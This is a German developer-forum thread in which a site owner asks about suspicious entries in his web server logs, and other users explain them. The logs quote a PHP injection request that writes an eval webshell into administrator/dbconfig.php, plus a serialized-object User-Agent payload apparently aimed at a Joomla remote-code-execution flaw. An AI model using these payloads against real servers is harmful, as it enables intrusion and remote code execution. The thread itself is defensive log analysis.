Autor Beitrag
Perlsau
Ehemaliges Mitglied
Erhaltene Danke: 2



BeitragVerfasst: Di 05.01.16 22:23 
Ein gutes Neues allerseits,

bevor hier endgültig das große Gähnen um sich greift, weil die Besucherzahlen rückläufig sind, hab ich hier mal eine etwas ominöse Sache, die ich vielleicht überbewerte ... oder auch nicht, aber auf jeden Fall nicht verstehe.

Seitdem ich mir einen eigenen Weblogger gebastelt habe (bzw. noch immer daran herumschraube), schaue ich mir die Anfragen an meine drei Webpräsenzen zwangsläufig öfter mal genauer an. Dabei sind mir einige seltsame Anfragen aufgefallen, die meist mit dem Response-Code 503 quittiert werden, der soviel bedeutet wie "Service unavailable", auf Deutsch soviel wie "Dienst nicht verfügbar". Diese "Anfragen" kommen aus aller Welt, die meisten betreffen eine nicht vorhandene Datei namens wp-login.php ... da versuchen wohl einige, eine nicht vorhandene WordPress-Installation zu knacken. Doch heute ist mir eine Anfrage aus Italien (Toscana, Bibbiena) aufgefallen, die mit einer mir völlig unverständlichen und daher auf mich bedrohlich wirkenden Anfrage im Protokoll steht:

"GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/administrator/dbconfig.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1"

Von dieser IP-Adresse wurden gezielt alle drei Webpräsenzen (gehostet bei 1&1) mit diesem Befehl "abgegrast". Hier ist vielleicht wichtig zu wissen, daß im Protokoll hinter dem Get die Datei steht, die heruntergeladen oder angezeigt werden soll. Es wird aber noch seltsamer: Als UserAgent (=Programm, das sie Abfrage tätigt, z.B. Webbrowser) steht im Protokoll das hier:

"}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"

Nun, ich habe weder WordPress noch eine MySQL-Datenbank am Laufen und daher wohl auch nichts zu befürchten, aber mich würde schon interessieren, was dieses kryptische Zeug zu bedeuten hat ... Vielleicht hat ja jemand von euch Ahnung von sowas ...
jaenicke
ontopic starontopic starontopic starontopic starontopic starontopic starontopic starofftopic star
Beiträge: 18342
Erhaltene Danke: 1518

W10 x64 (Chrome, IE11)
Delphi 10.1 Ent, Oxygene, C# (VS 2015), JS/HTML, Java (NB), PHP, Lazarus
BeitragVerfasst: Mi 06.01.16 06:59 
Da versucht jemand in die administrator/dbconfig.php einen PHP eval Befehl zu schreiben. Wäre dies erfolgreich, könnte man danach einfach diese Datei mit einem beliebigen PHP-Befehl als Parameter aufrufen und er würde auf dem Server ausgeführt. Der Befehl, der in die Datei geschrieben werden soll, lautet nämlich einfach:
ausblenden PHP-Quelltext
1:
<?php eval($_POST[1]);?>					

Mit WordPress oder MySQL hat das nichts zu tun, es reicht, wenn die Webseite nicht sauber programmiert ist und die übergebenen Befehle ausführt.

_________________
Alle eigenen Projekte sind eingestellt, ebenso meine Homepage, Downloadlinks usw. im Forum bleiben aktiv!


Zuletzt bearbeitet von jaenicke am Mi 06.01.16 07:01, insgesamt 1-mal bearbeitet
Nersgatt
ontopic starontopic starontopic starontopic starontopic starontopic starhalf ontopic starofftopic star
Beiträge: 1550
Erhaltene Danke: 263


Delphi 10 Seattle Prof.
BeitragVerfasst: Mi 06.01.16 07:00 
Ich würde sagen, das wird versucht eine Joomla Sicherheitslücke auszunutzen: blog.cloudflare.com/...alize-vulnerability/

_________________
Gruß, Jens
Zuerst ignorieren sie dich, dann lachen sie über dich, dann bekämpfen sie dich und dann gewinnst du. (Mahatma Gandhi)
Perlsau
Ehemaliges Mitglied
Erhaltene Danke: 2



BeitragVerfasst: Mi 06.01.16 08:35 
Moin Jaenicke,
user profile iconjaenicke hat folgendes geschrieben Zum zitierten Posting springen:
Da versucht jemand in die administrator/dbconfig.php einen PHP eval Befehl zu schreiben. Wäre dies erfolgreich, könnte man danach einfach diese Datei mit einem beliebigen PHP-Befehl als Parameter aufrufen und er würde auf dem Server ausgeführt. Der Befehl, der in die Datei geschrieben werden soll, lautet nämlich einfach:
ausblenden PHP-Quelltext
1:
<?php eval($_POST[1]);?>					

Die Datei administrator/dbconfig.php gibt's bei mir jedoch nicht, zumindest nirgendwo in jener Ordner-Struktur, auf die ich via FTP Zugang habe. Dann habe ich wohl nichts zu befürchten.

user profile iconjaenicke hat folgendes geschrieben Zum zitierten Posting springen:
Mit WordPress oder MySQL hat das nichts zu tun, es reicht, wenn die Webseite nicht sauber programmiert ist und die übergebenen Befehle ausführt.

Naja, ich las eben nur diese Sachen aus dem String, der den User-Agenten beschreiben soll, heraus: "JDatabaseDriverMysqli\" und "JDatabaseDriverMysql\". Versuche, eine vermutete WordPress-Installation zu "knacken", bemerke ich recht häufig, das sind aber andere Fälle, die dann z.B. so aussehen:

ausblenden Quelltext
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
Datei:    /wp-login.php
Größe:    323 Bytes
Datum:    12.10.2015 um 10:09:44
Meldung:  Dienst nicht verfügbar
Domain:    irwish.de
Referenz:  _unbekannt
User-Agent:  Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Ip-Nummer:  54.215.188.162
Land:    United States
Staat:    California
PLZ Stadt:  94102   San Francisco
Lat / Lon:  37,77493 / -122,41942
Zone:    -08:00:00


Hier zähle ich heute morgen nach der letzten Aktualisierung der Datenbank 320 Versuche seit dem 29.07.2015, und zwar aus aller Herren Länder, China, Ukraine, Frankreich, Italien, Kasachstan usw.

Moin Nersgatt,
user profile iconNersgatt hat folgendes geschrieben Zum zitierten Posting springen:
Ich würde sagen, das wird versucht eine Joomla Sicherheitslücke auszunutzen: blog.cloudflare.com/...alize-vulnerability/

Den Link-Inhalt hab ich mir kurz angeschaut, muß aber gestehen, daß ich davon nicht wirklich etwas begreife. Und da ich kein Joomla verwende, bin ich hier wohl auf der sicheren Seite :gruebel:

Muß oder sollte ich jetzt was unternehmen wegen diesen Versuchen, z.B. den italienischen Provider oder besser gleich die Bundeszentrale für Sicherheit in der Informationstechnik benachrichtigen?
jaenicke
ontopic starontopic starontopic starontopic starontopic starontopic starontopic starofftopic star
Beiträge: 18342
Erhaltene Danke: 1518

W10 x64 (Chrome, IE11)
Delphi 10.1 Ent, Oxygene, C# (VS 2015), JS/HTML, Java (NB), PHP, Lazarus
BeitragVerfasst: Mi 06.01.16 08:40 
user profile iconPerlsau hat folgendes geschrieben Zum zitierten Posting springen:
Die Datei administrator/dbconfig.php gibt's bei mir jedoch nicht, zumindest nirgendwo in jener Ordner-Struktur, auf die ich via FTP Zugang habe. Dann habe ich wohl nichts zu befürchten.
Dann war der Angriff vermutlich nicht erfolgreich. Theoretisch könnte diese natürlich auch schon wieder gelöscht worden sein, aber das ist wohl unwahrscheinlich. Du kannst ja prüfen, ob es auf die Datei Zugriffsversuche gab. Wenn diese nicht erfolgreich waren, passt alles.

Solange auf der Webseite nicht der von user profile iconNersgatt verlinkte Code benutzt wird, kann der Code aber auch nicht erfolgreich sein. Das beschränkt sich aber nicht auf Joomla. Der Code wurde auch in anderen Systemen benutzt.

_________________
Alle eigenen Projekte sind eingestellt, ebenso meine Homepage, Downloadlinks usw. im Forum bleiben aktiv!
Perlsau
Ehemaliges Mitglied
Erhaltene Danke: 2



BeitragVerfasst: Mi 06.01.16 09:16 
Es gibt hier überhaupt keine PHP-Dateien. Meine Webseiten sind vollkommen statisch und bestehen aus reinstem HTML, keine Buttons, kein Javascript.

Jetzt hab ich mal in älteren Logs nach mysql gesucht, finde dort aber nichts weiter außer ein paar Usern der Delphipraxis, die von dort (aus einem Thema, das den Begriff mysql enthält) auf einer meiner Sites gelandet sind.
jaenicke
ontopic starontopic starontopic starontopic starontopic starontopic starontopic starofftopic star
Beiträge: 18342
Erhaltene Danke: 1518

W10 x64 (Chrome, IE11)
Delphi 10.1 Ent, Oxygene, C# (VS 2015), JS/HTML, Java (NB), PHP, Lazarus
BeitragVerfasst: Mi 06.01.16 12:31 
user profile iconPerlsau hat folgendes geschrieben Zum zitierten Posting springen:
Es gibt hier überhaupt keine PHP-Dateien. Meine Webseiten sind vollkommen statisch und bestehen aus reinstem HTML, keine Buttons, kein Javascript.
Dann brauchst du dir gar keine Sorgen machen. Solche Angriffe basieren darauf, dass Parameter an Skripte falsch behandelt werden usw., was aber natürlich nur gehen kann, wenn du auch Skripte auf dem Server hast.
Wenn du nur HTML-Seiten ohne PHP oder irgendetwas drauf liegen hast, kann da auch nichts passieren.

Einzig ein Angriff auf den Webserver an sich wäre noch möglich, aber darauf hast du dann wenig Einfluss. Du kannst nur prüfen, ob dein Hoster den Webserver aktuell hält.

_________________
Alle eigenen Projekte sind eingestellt, ebenso meine Homepage, Downloadlinks usw. im Forum bleiben aktiv!
Nersgatt
ontopic starontopic starontopic starontopic starontopic starontopic starhalf ontopic starofftopic star
Beiträge: 1550
Erhaltene Danke: 263


Delphi 10 Seattle Prof.
BeitragVerfasst: Mi 06.01.16 12:57 
Und ein Erraten des FTP-Passwortes wäre denkbar.

_________________
Gruß, Jens
Zuerst ignorieren sie dich, dann lachen sie über dich, dann bekämpfen sie dich und dann gewinnst du. (Mahatma Gandhi)